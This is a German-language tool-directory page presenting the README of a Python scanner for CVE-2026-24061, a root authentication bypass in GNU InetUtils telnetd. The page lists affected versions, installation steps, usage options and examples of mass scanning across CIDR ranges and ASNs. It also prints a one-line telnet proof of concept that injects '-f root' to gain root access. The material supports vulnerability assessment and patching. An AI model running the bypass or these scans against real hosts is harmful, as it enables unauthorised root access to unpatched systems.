Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Twenty-Three-Scanner — CVE-2026-24061 - GNU InetUtils Telnetd Umgehung der Remote-Authentifizierung | Kitploit
Tools/GitHubGitHub/madfxr/twenty-three-scanner
AufklärungSchwachstellenscannerExploitationInformationsbeschaffungNetzwerksicherheitPenetrationstests
GitHubmadfxr/twenty-three-scanner

Twenty-Three-Scanner

CVE-2026-24061 - GNU InetUtils Telnetd Umgehung der Remote-Authentifizierung

Repository anzeigen
4vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛰️ Twenty-Three Scanner

Ein leistungsstarker, schneller und eleganter Scanner zur Erkennung verwundbarer Telnetd-Dienste, die von CVE-2026-24061 betroffen sind. Gebaut mit der reinen Python-Standardbibliothek – keine externen Abhängigkeiten erforderlich.

License: MIT Python 3.x Android Windows macOS Solaris FreeBSD Linux Offensive Security Ethical Hacking CVE-2026-24061 GNU InetUtils Telnetd


🔗 Inhaltsverzeichnis

  • ⚖️ Lizenz
  • 🧩 Funktionen
  • ☣️ Schwachstellendetails
    • ⚡ Dienststatus
    • 🧪 Proof of Concept (PoC)
    • 💥 Betroffene Versionen
    • 🧵 Behobene Versionen
    • ⚔️ Angriffsvektor
    • 🚨 CVSS-Score
  • 🛠️ Installation
  • 📜 Verwendung
  • 🎯 Beispiele
  • ⚗️ Demonstrationen
  • 📖 Referenzen

🧩 Funktionen

  • 🚀 Hochleistungs-Scanning – Multithread-Architektur mit konfigurierbarer Thread-Anzahl.
  • 🌐 Flexible Ziel-Eingabe – Unterstützung für einzelne IPs, CIDR-Bereiche, ASN-Abfragen und dateibasierte Listen.
  • 📊 Echtzeit-Fortschritt – Schöne Unicode-basierte Benutzeroberfläche mit Live-Fortschrittsbalken.
  • 🤖 ASN-Intelligenz – Automatisches Abrufen von Präfixen von RADB, BGPView und HackerTarget-APIs.
  • 🌍 GEO-Standort-Intelligenz – Echtzeit-Abruf von ASN, Anbieter und Standort von der ipapi-API.
  • 💾 Sanfte Unterbrechung – CTRL+C-Behandlung mit automatischem Speichern der Ergebnisse.
  • 📝 Detaillierte Protokollierung – Konfigurierbare Ausführlichkeitsstufen für das Debugging.
  • 🛡️ Sicheres Scannen – Integrierte Grenzwerte zur Vermeidung versehentlicher Massen-Scans.
  • 🎨 Saubere Ausgabe – Professionelle Tabellen mit Rahmen und Scan-Zusammenfassungen.
  • 📦 Null Abhängigkeiten – Nur die reine Python 3.x-Standardbibliothek.

☣️ Schwachstellendetails

CVE-2026-24061 ist eine kritische Authentifizierungs-Bypass-Schwachstelle in GNU InetUtils Telnetd, die nicht authentifizierten Remote-Angreifern Root-Zugriff ermöglicht, indem die Behandlung der NEW-ENVIRON-Option ausgenutzt wird.


⚡ Dienststatus

Im Folgenden ist die Telnetd-Dienstkonfiguration auf der Zielhost-Seite dargestellt.

image


🧪 Proof of Concept (PoC)

Und hier ist das Proof of Concept (PoC) für diese Schwachstelle, das manuell vom Host des Angreifers ausgeführt werden kann, indem einfach der Befehl USER="-f root" telnet -a <TARGET_HOST> 23 ausgeführt wird.

image


💥 Betroffene Versionen

  • GNU InetUtils >=1.9.3 <=2.7.
  • Verschiedene eingebettete Linux-Distributionen.
  • IoT-Geräte mit verwundbaren Telnetd-Implementierungen.

🧵 Behobene Versionen

  • GNU InetUtils >=2.8.

⚔️ Angriffsvektor

Die Schwachstelle nutzt eine unsachgemäße Validierung der USER-Umgebungsvariable in der Telnet-NEW-ENVIRON (RFC 1572)-Optionsaushandlung aus, wodurch Angreifer bösartige Werte wie -f root injizieren können, um die Authentifizierung zu umgehen.


🚨 CVSS-Score

9.8 (Kritisch) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.


🛠️ Installation

root@kitploit:~
# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner

# Make Executable
sudo chmod +x twenty-three-scanner.py

# Run the Script
sudo python3 twenty-three-scanner.py -h

📜 Verwendung

Im Folgenden finden Sie ein Handbuch für das Twenty-Three Scanner-Tool, mit dem die Schwachstelle CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass erkannt werden kann.

root@kitploit:~
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
                                       [--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]

CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass

options:
  -h, --help            show this help message and exit

Target Options:
  -t TARGET, --target TARGET
                        target IP, CIDR, or comma-separated list (can be used multiple times)
  -f FILE, --file FILE  file containing targets (one per line, supports comments with #)
  -a ASN, --asn ASN     autonomous system number (e.g., AS10111 or 10111)

Scan Options:
  -p PORT, --port PORT  target port(s), comma-separated (default: 23)
  --threads N           number of concurrent threads (default: 50)
  --user-value VALUE    USER environment variable value for exploit (default: '-f root')

Timeout Options:
  --connect-timeout SEC
                        TCP connection timeout in seconds (default: 3.0)
  --read-timeout SEC    socket read timeout in seconds (default: 2.0)
  --id-timeout SEC      'id' command response timeout in seconds (default: 2.0)

Limit Options:
  --max-hosts-per-cidr N
                        maximum hosts to scan per CIDR block (default: 1024)
  --max-total-hosts N   maximum total hosts across all targets (default: 50000)
  --skip-large-networks
                        skip networks larger than /16 (avoids accidentally scanning huge ranges)

Output Options:
  -o FILE, --output FILE
                        save vulnerable hosts to file (format: IP:PORT)
  -v, --verbose         enable verbose debug logging

🎯 Beispiele

Und hier sind einige Beispiele für die Verwendung des Befehls.

root@kitploit:~
  # Scan Single IP Address, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23

  # Scan Single IP Address, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323

  # Scan Multiple IP Addresses, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23

  # Scan Multiple Addresses, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323

  # Scan CIDR Range, and Single Port with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt

  # Scan CIDR Range, and Multiple Ports with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt

  # Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt

  # Scan Single IP Address, Multiple IP Addresss, or CIDR Range from File, and Multiple Ports with Custom Threads and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt

  # Scan ASN and Single Port with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100

  # Scan ASN and Multiple Ports with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100

  # Scan ASN with Custom Limits and Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100

⚗️ Demonstrationen

Scan einer einzelnen IP-Adresse mit mehreren Ports.

image

Scan mehrerer IP-Adressen mit einem einzelnen Port.

image

Scan eines CIDR-Bereichs mit einem einzelnen Port.

image

Scan einer ASN mit mehreren Ports.

image

Scan einer einzelnen IP-Adresse, mehrerer Adressen oder eines CIDR-Bereichs aus einer Datei sowie eines einzelnen Ports mit benutzerdefiniertem Thread und Ausgabe.

image


📖 Referenzen

  • Critical GNU InetUtils telnetd Flaw Lets Attackers Bypass Login and Gain Root Access
  • NVD - CVE-2026-24061
  • CVE Record: CVE-2026-24061
  • Inetutils - GNU network utilities
  • [SECURITY] [DLA 4453-1] inetutils security update
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnet
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • CVE-2026-24061 Telnet RCE Exploit - By SafeBreach Labs
Tool herunterladen